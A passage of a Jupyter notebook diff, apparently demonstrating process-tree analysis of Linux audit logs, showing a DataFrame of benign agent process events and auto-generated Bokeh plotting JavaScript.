+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Full tree size: 64\n"
+     ]
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>EventType</th>\n",
+       "      <th>TenantId</th>\n",
+       "      <th>Computer</th>\n",
+       "      <th>mssg_id</th>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th>a0</th>\n",
+       "      <th>a1</th>\n",
+       "      <th>a2</th>\n",
+       "      <th>argc</th>\n",
+       "      <th>auid</th>\n",
+       "      <th>...</th>\n",
+       "      <th>timestamp_orig_par</th>\n",
+       "      <th>NewProcessId_par</th>\n",
+       "      <th>ParentName</th>\n",
+       "      <th>parent_proc_lc</th>\n",
+       "      <th>parent_key</th>\n",
+       "      <th>IsRoot</th>\n",
+       "      <th>IsLeaf</th>\n",
+       "      <th>IsBranch</th>\n",
+       "      <th>path</th>\n",
+       "      <th>parent_index</th>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>proc_key</th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>unknown|1350|1970-01-01 00:00:00.000000</th>\n",
+       "      <td>SYSCALL_EXECVE</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>MSTICAlertsLxVM2</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>1970-01-01 00:00:00+00:00</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>...</td>\n",
+       "      <td>NaT</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>unknown</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>True</td>\n",
+       "      <td>False</td>\n",
+       "      <td>False</td>\n",
+       "      <td>1002</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>/usr/bin/sudo|26373|2019-02-17 22:01:26.357000</th>\n",
+       "      <td>SYSCALL_EXECVE</td>\n",
+       "      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n",
+       "      <td>MSTICAlertsLxVM2</td>\n",
+       "      <td>1550440886.357:8972854</td>\n",
+       "      <td>2019-02-17 22:01:26.357000+00:00</td>\n",
+       "      <td>sudo</td>\n",
+       "      <td>/opt/microsoft/omsagent/ruby/bin/ruby</td>\n",
+       "      <td>/opt/microsoft/omsagent/plugin/tailfilereader.rb</td>\n",
+       "      <td>6.0</td>\n",
+       "      <td>-1.0</td>\n",
+       "      <td>...</td>\n",
+       "      <td>1970-01-01 00:00:00+00:00</td>\n",
+       "      <td>1350</td>\n",
+       "      <td>unknown</td>\n",
+       "      <td>unknown</td>\n",
+       "      <td>unknown|1350|1970-01-01 00:00:00.000000</td>\n",
+       "      <td>False</td>\n",
+       "      <td>False</td>\n",
+       "      <td>True</td>\n",
+       "      <td>1002/159</td>\n",
+       "      <td>1002</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>/opt/microsoft/omsagent/ruby/bin/ruby|26375|2019-02-17 22:01:26.369000</th>\n",
+       "      <td>SYSCALL_EXECVE</td>\n",
+       "      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n",
+       "      <td>MSTICAlertsLxVM2</td>\n",
+       "      <td>1550440886.369:8972858</td>\n",
+       "      <td>2019-02-17 22:01:26.369000+00:00</td>\n",
+       "      <td>/opt/microsoft/omsagent/ruby/bin/ruby</td>\n",
+       "      <td>/opt/microsoft/omsagent/plugin/tailfilereader.rb</td>\n",
+       "      <td>/var/log/audit/audit.log</td>\n",
+       "      <td>5.0</td>\n",
+       "      <td>-1.0</td>\n",
+       "      <td>...</td>\n",
+       "      <td>2019-02-17 22:01:26.357000+00:00</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>/usr/bin/sudo</td>\n",
+       "      <td>/usr/bin/sudo</td>\n",
+       "      <td>/usr/bin/sudo|26373|2019-02-17 22:01:26.357000</td>\n",
+       "      <td>False</td>\n",
+       "      <td>False</td>\n",
+       "      <td>True</td>\n",
+       "      <td>1002/159/160</td>\n",
+       "      <td>159</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>/usr/bin/sudo|26377|2019-02-17 22:01:26.449000</th>\n",
+       "      <td>SYSCALL_EXECVE</td>\n",
+       "      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n",
+       "      <td>MSTICAlertsLxVM2</td>\n",
+       "      <td>1550440886.449:8972859</td>\n",
+       "      <td>2019-02-17 22:01:26.449000+00:00</td>\n",
+       "      <td>sudo</td>\n",
+       "      <td>test</td>\n",
+       "      <td>-f</td>\n",
+       "      <td>4.0</td>\n",
+       "      <td>-1.0</td>\n",
+       "      <td>...</td>\n",
+       "      <td>2019-02-17 22:01:26.369000+00:00</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>/opt/microsoft/omsagent/ruby/bin/ruby</td>\n",
+       "      <td>/opt/microsoft/omsagent/ruby/bin/ruby</td>\n",
+       "      <td>/opt/microsoft/omsagent/ruby/bin/ruby|26375|20...</td>\n",
+       "      <td>False</td>\n",
+       "      <td>False</td>\n",
+       "      <td>True</td>\n",
+       "      <td>1002/159/160/161</td>\n",
+       "      <td>160</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>/usr/bin/test|26378|2019-02-17 22:01:26.465000</th>\n",
+       "      <td>SYSCALL_EXECVE</td>\n",
+       "      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n",
+       "      <td>MSTICAlertsLxVM2</td>\n",
+       "      <td>1550440886.465:8972863</td>\n",
+       "      <td>2019-02-17 22:01:26.465000+00:00</td>\n",
+       "      <td>test</td>\n",
+       "      <td>-f</td>\n",
+       "      <td>/var/log/audit/audit.log</td>\n",
+       "      <td>3.0</td>\n",
+       "      <td>-1.0</td>\n",
+       "      <td>...</td>\n",
+       "      <td>2019-02-17 22:01:26.449000+00:00</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>/usr/bin/sudo</td>\n",
+       "      <td>/usr/bin/sudo</td>\n",
+       "      <td>/usr/bin/sudo|26377|2019-02-17 22:01:26.449000</td>\n",
+       "      <td>False</td>\n",
+       "      <td>True</td>\n",
+       "      <td>False</td>\n",
+       "      <td>1002/159/160/161/162</td>\n",
+       "      <td>161</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "<p>5 rows × 41 columns</p>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                                                         EventType  \\\n",
+       "proc_key                                                             \n",
+       "unknown|1350|1970-01-01 00:00:00.000000             SYSCALL_EXECVE   \n",
+       "/usr/bin/sudo|26373|2019-02-17 22:01:26.357000      SYSCALL_EXECVE   \n",
+       "/opt/microsoft/omsagent/ruby/bin/ruby|26375|201...  SYSCALL_EXECVE   \n",
+       "/usr/bin/sudo|26377|2019-02-17 22:01:26.449000      SYSCALL_EXECVE   \n",
+       "/usr/bin/test|26378|2019-02-17 22:01:26.465000      SYSCALL_EXECVE   \n",
+       "\n",
+       "                                                                                TenantId  \\\n",
+       "proc_key                                                                                   \n",
+       "unknown|1350|1970-01-01 00:00:00.000000                                              NaN   \n",
+       "/usr/bin/sudo|26373|2019-02-17 22:01:26.357000      52b1ab41-869e-4138-9e40-2a4457f09bf0   \n",
+       "/opt/microsoft/omsagent/ruby/bin/ruby|26375|201...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \n",
+       "/usr/bin/sudo|26377|2019-02-17 22:01:26.449000      52b1ab41-869e-4138-9e40-2a4457f09bf0   \n",
+       "/usr/bin/test|26378|2019-02-17 22:01:26.465000      52b1ab41-869e-4138-9e40-2a4457f09bf0   \n",
+       "\n",
+       "                                                            Computer  \\\n",
+       "proc_key                                                               \n",
+       "unknown|1350|1970-01-01 00:00:00.000000             MSTICAlertsLxVM2   \n",
+       "/usr/bin/sudo|26373|2019-02-17 22:01:26.357000      MSTICAlertsLxVM2   \n",
+       "/opt/microsoft/omsagent/ruby/bin/ruby|26375|201...  MSTICAlertsLxVM2   \n",
+       "/usr/bin/sudo|26377|2019-02-17 22:01:26.449000      MSTICAlertsLxVM2   \n",
+       "/usr/bin/test|26378|2019-02-17 22:01:26.465000      MSTICAlertsLxVM2   \n",
+       "\n",
+       "                                                                   mssg_id  \\\n",
+       "proc_key                                                                     \n",
+       "unknown|1350|1970-01-01 00:00:00.000000                                NaN   \n",
+       "/usr/bin/sudo|26373|2019-02-17 22:01:26.357000      1550440886.357:8972854   \n",
+       "/opt/microsoft/omsagent/ruby/bin/ruby|26375|201...  1550440886.369:8972858   \n",
+       "/usr/bin/sudo|26377|2019-02-17 22:01:26.449000      1550440886.449:8972859   \n",
+       "/usr/bin/test|26378|2019-02-17 22:01:26.465000      1550440886.465:8972863   \n",
+       "\n",
+       "                                                                      TimeGenerated  \\\n",
+       "proc_key                                                                              \n",
+       "unknown|1350|1970-01-01 00:00:00.000000                   1970-01-01 00:00:00+00:00   \n",
+       "/usr/bin/sudo|26373|2019-02-17 22:01:26.357000     2019-02-17 22:01:26.357000+00:00   \n",
+       "/opt/microsoft/omsagent/ruby/bin/ruby|26375|201... 2019-02-17 22:01:26.369000+00:00   \n",
+       "/usr/bin/sudo|26377|2019-02-17 22:01:26.449000     2019-02-17 22:01:26.449000+00:00   \n",
+       "/usr/bin/test|26378|2019-02-17 22:01:26.465000     2019-02-17 22:01:26.465000+00:00   \n",
+       "\n",
+       "                                                                                       a0  \\\n",
+       "proc_key                                                                                    \n",
+       "unknown|1350|1970-01-01 00:00:00.000000                                               NaN   \n",
+       "/usr/bin/sudo|26373|2019-02-17 22:01:26.357000                                       sudo   \n",
+       "/opt/microsoft/omsagent/ruby/bin/ruby|26375|201...  /opt/microsoft/omsagent/ruby/bin/ruby   \n",
+       "/usr/bin/sudo|26377|2019-02-17 22:01:26.449000                                       sudo   \n",
+       "/usr/bin/test|26378|2019-02-17 22:01:26.465000                                       test   \n",
+       "\n",
+       "                                                                                                  a1  \\\n",
+       "proc_key                                                                                               \n",
+       "unknown|1350|1970-01-01 00:00:00.000000                                                          NaN   \n",
+       "/usr/bin/sudo|26373|2019-02-17 22:01:26.357000                 /opt/microsoft/omsagent/ruby/bin/ruby   \n",
+       "/opt/microsoft/omsagent/ruby/bin/ruby|26375|201...  /opt/microsoft/omsagent/plugin/tailfilereader.rb   \n",
+       "/usr/bin/sudo|26377|2019-02-17 22:01:26.449000                                                  test   \n",
+       "/usr/bin/test|26378|2019-02-17 22:01:26.465000                                                    -f   \n",
+       "\n",
+       "                                                                                                  a2  \\\n",
+       "proc_key                                                                                               \n",
+       "unknown|1350|1970-01-01 00:00:00.000000                                                          NaN   \n",
+       "/usr/bin/sudo|26373|2019-02-17 22:01:26.357000      /opt/microsoft/omsagent/plugin/tailfilereader.rb   \n",
+       "/opt/microsoft/omsagent/ruby/bin/ruby|26375|201...                          /var/log/audit/audit.log   \n",
+       "/usr/bin/sudo|26377|2019-02-17 22:01:26.449000                                                    -f   \n",
+       "/usr/bin/test|26378|2019-02-17 22:01:26.465000                              /var/log/audit/audit.log   \n",
+       "\n",
+       "                                                    argc  auid  ...  \\\n",
+       "proc_key                                                        ...   \n",
+       "unknown|1350|1970-01-01 00:00:00.000000              NaN   NaN  ...   \n",
+       "/usr/bin/sudo|26373|2019-02-17 22:01:26.357000       6.0  -1.0  ...   \n",
+       "/opt/microsoft/omsagent/ruby/bin/ruby|26375|201...   5.0  -1.0  ...   \n",
+       "/usr/bin/sudo|26377|2019-02-17 22:01:26.449000       4.0  -1.0  ...   \n",
+       "/usr/bin/test|26378|2019-02-17 22:01:26.465000       3.0  -1.0  ...   \n",
+       "\n",
+       "                                                                  timestamp_orig_par  \\\n",
+       "proc_key                                                                               \n",
+       "unknown|1350|1970-01-01 00:00:00.000000                                          NaT   \n",
+       "/usr/bin/sudo|26373|2019-02-17 22:01:26.357000             1970-01-01 00:00:00+00:00   \n",
+       "/opt/microsoft/omsagent/ruby/bin/ruby|26375|201...  2019-02-17 22:01:26.357000+00:00   \n",
+       "/usr/bin/sudo|26377|2019-02-17 22:01:26.449000      2019-02-17 22:01:26.369000+00:00   \n",
+       "/usr/bin/test|26378|2019-02-17 22:01:26.465000      2019-02-17 22:01:26.449000+00:00   \n",
+       "\n",
+       "                                                   NewProcessId_par  \\\n",
+       "proc_key                                                              \n",
+       "unknown|1350|1970-01-01 00:00:00.000000                         NaN   \n",
+       "/usr/bin/sudo|26373|2019-02-17 22:01:26.357000                 1350   \n",
+       "/opt/microsoft/omsagent/ruby/bin/ruby|26375|201...              NaN   \n",
+       "/usr/bin/sudo|26377|2019-02-17 22:01:26.449000                  NaN   \n",
+       "/usr/bin/test|26378|2019-02-17 22:01:26.465000                  NaN   \n",
+       "\n",
+       "                                                                               ParentName  \\\n",
+       "proc_key                                                                                    \n",
+       "unknown|1350|1970-01-01 00:00:00.000000                                           unknown   \n",
+       "/usr/bin/sudo|26373|2019-02-17 22:01:26.357000                                    unknown   \n",
+       "/opt/microsoft/omsagent/ruby/bin/ruby|26375|201...                          /usr/bin/sudo   \n",
+       "/usr/bin/sudo|26377|2019-02-17 22:01:26.449000      /opt/microsoft/omsagent/ruby/bin/ruby   \n",
+       "/usr/bin/test|26378|2019-02-17 22:01:26.465000                              /usr/bin/sudo   \n",
+       "\n",
+       "                                                                           parent_proc_lc  \\\n",
+       "proc_key                                                                                    \n",
+       "unknown|1350|1970-01-01 00:00:00.000000                                               NaN   \n",
+       "/usr/bin/sudo|26373|2019-02-17 22:01:26.357000                                    unknown   \n",
+       "/opt/microsoft/omsagent/ruby/bin/ruby|26375|201...                          /usr/bin/sudo   \n",
+       "/usr/bin/sudo|26377|2019-02-17 22:01:26.449000      /opt/microsoft/omsagent/ruby/bin/ruby   \n",
+       "/usr/bin/test|26378|2019-02-17 22:01:26.465000                              /usr/bin/sudo   \n",
+       "\n",
+       "                                                                                           parent_key  \\\n",
+       "proc_key                                                                                                \n",
+       "unknown|1350|1970-01-01 00:00:00.000000                                                           NaN   \n",
+       "/usr/bin/sudo|26373|2019-02-17 22:01:26.357000                unknown|1350|1970-01-01 00:00:00.000000   \n",
+       "/opt/microsoft/omsagent/ruby/bin/ruby|26375|201...     /usr/bin/sudo|26373|2019-02-17 22:01:26.357000   \n",
+       "/usr/bin/sudo|26377|2019-02-17 22:01:26.449000      /opt/microsoft/omsagent/ruby/bin/ruby|26375|20...   \n",
+       "/usr/bin/test|26378|2019-02-17 22:01:26.465000         /usr/bin/sudo|26377|2019-02-17 22:01:26.449000   \n",
+       "\n",
+       "                                                    IsRoot IsLeaf IsBranch  \\\n",
+       "proc_key                                                                     \n",
+       "unknown|1350|1970-01-01 00:00:00.000000               True  False    False   \n",
+       "/usr/bin/sudo|26373|2019-02-17 22:01:26.357000       False  False     True   \n",
+       "/opt/microsoft/omsagent/ruby/bin/ruby|26375|201...   False  False     True   \n",
+       "/usr/bin/sudo|26377|2019-02-17 22:01:26.449000       False  False     True   \n",
+       "/usr/bin/test|26378|2019-02-17 22:01:26.465000       False   True    False   \n",
+       "\n",
+       "                                                                    path  \\\n",
+       "proc_key                                                                   \n",
+       "unknown|1350|1970-01-01 00:00:00.000000                             1002   \n",
+       "/usr/bin/sudo|26373|2019-02-17 22:01:26.357000                  1002/159   \n",
+       "/opt/microsoft/omsagent/ruby/bin/ruby|26375|201...          1002/159/160   \n",
+       "/usr/bin/sudo|26377|2019-02-17 22:01:26.449000          1002/159/160/161   \n",
+       "/usr/bin/test|26378|2019-02-17 22:01:26.465000      1002/159/160/161/162   \n",
+       "\n",
+       "                                                   parent_index  \n",
+       "proc_key                                                         \n",
+       "unknown|1350|1970-01-01 00:00:00.000000                     NaN  \n",
+       "/usr/bin/sudo|26373|2019-02-17 22:01:26.357000             1002  \n",
+       "/opt/microsoft/omsagent/ruby/bin/ruby|26375|201...          159  \n",
+       "/usr/bin/sudo|26377|2019-02-17 22:01:26.449000              160  \n",
+       "/usr/bin/test|26378|2019-02-17 22:01:26.465000              161  \n",
+       "\n",
+       "[5 rows x 41 columns]"
+      ]
+     },
+     "execution_count": 5,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "# Take one of those roots and get the full tree beneath it\n",
+    "t_root = ptree.get_roots(p_tree_lx).iloc[2]\n",
+    "full_tree = ptree.get_descendents(p_tree_lx, t_root)\n",
+    "print(\"Full tree size:\", len(full_tree))\n",
+    "full_tree.head()"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 23,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-08-25T15:53:30.367996Z",
+     "start_time": "2020-08-25T15:53:30.244997Z"
+    },
+    "persistent_id": "77bbbefd-2888-4127-b95a-18e2f1030039"
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"2426\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  const force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  const JS_MIME_TYPE = 'application/javascript';\n  const HTML_MIME_TYPE = 'text/html';\n  const EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  const CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    const script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    const cell = handle.cell;\n\n    const id = cell.output_area._bokeh_element_id;\n    const server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      const cmd_clean = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd_clean, {\n        iopub: {\n          output: function(msg) {\n            const id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      const cmd_destroy = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd_destroy);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    const output_area = handle.output_area;\n    const output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n      return\n    }\n\n    const toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      const bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      const script_attrs = bk_div.children[0].attributes;\n      for (let i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      const toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      const props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    const events = require('base/js/events');\n    const OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  const NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    const el = document.getElementById(\"2426\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  const js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.4.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.4.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.4.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.4.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-mathjax-2.4.2.min.js\"];\n  const css_urls = [];\n  \n\n  const inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (let i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      const cell = $(document.getElementById(\"2426\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"211a8316-13cb-485c-9a7a-64b769a2e517\" data-root-id=\"2548\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "(function(root) {\n  function embed_document(root) {\n    \n  const docs_json = {\"e2972026-78d2-4b04-b72e-4ae28c52cb2c\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"children\":[{\"id\":\"2429\"},{\"id\":\"2505\"}]},\"id\":\"2548\",\"type\":\"Row\"},{\"attributes\":{\"axis\":{\"id\":\"2514\"},\"coordinates\":null,\"grid_line_color\":null,\"group\":null,\"ticker\":null},\"id\":\"2517\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"2438\",\"type\":\"LinearScale\"},{\"attributes\":{\"factors\":[\"MSTICAlertsWin1$\"],\"palette\":[\"#440154\",\"#208F8C\",\"#FDE724\"]},\"id\":\"2428\",\"type\":\"CategoricalColorMapper\"},{\"attributes\":{\"overlay\":{\"id\":\"2544\"},\"x_range\":null,\"y_range\":{\"id\":\"2434\"}},\"id\":\"2543\",\"type\":\"RangeTool\"},{\"attributes\":{\"active_multi\":{\"id\":\"2543\"},\"tools\":[{\"id\":\"2522\"},{\"id\":\"2523\"},{\"id\":\"2524\"},{\"id\":\"2525\"},{\"id\":\"2526\"},{\"id\":\"2527\"},{\"id\":\"2543\"}]},\"id\":\"2529\",\"type\":\"Toolbar\"},{\"attributes\":{},\"id\":\"2512\",\"type\":\"LinearScale\"},{\"attributes\":{\"source\":{\"id\":\"2427\"}},\"id\":\"2542\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"2562\",\"type\":\"AllLabels\"},{\"attributes\":{},\"id\":\"2523\",\"type\":\"WheelZoomTool\"},{\"attributes\":{},\"id\":\"2527\",\"type\":\"HelpTool\"},{\"attributes\":{},\"id\":\"2561\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"end\":76,\"start\":55},\"id\":\"2434\",\"type\":\"Range1d\"},{\"attributes\":{\"text\":{\"field\":\"__proc_id$$\"},\"text_alpha\":{\"value\":0.1},\"text_baseline\":{\"value\":\"middle\"},\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"2493\"}},\"y\":{\"fie